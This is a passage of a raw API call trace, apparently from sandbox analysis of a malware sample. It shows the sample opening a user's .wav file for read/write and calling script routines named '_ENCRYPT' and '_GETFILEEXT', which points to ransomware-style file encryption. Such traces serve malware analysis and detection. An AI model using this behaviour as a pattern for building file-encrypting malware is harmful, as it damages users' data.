HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", cchWideChar=108, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 108 [0186.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0186.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", cchWideChar=108, lpMultiByteStr=0x906f38, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpUsedDefaultChar=0x0) returned 108 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.512] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\y3qznbvqkq2ur4uosf8q.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=108, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd8) returned 0x8feba8 [0186.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=108, lpWideCharStr=0x8feba8, cchWideChar=108 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav") returned 108 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8fff00 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.516] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.517] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.517] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.517] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.517] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0186.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba1c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0186.519] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.519] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.520] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0186.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.520] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.520] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.520] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.521] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0186.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0x90add8 [0186.523] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.523] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0x90add8 [0186.524] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.524] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS 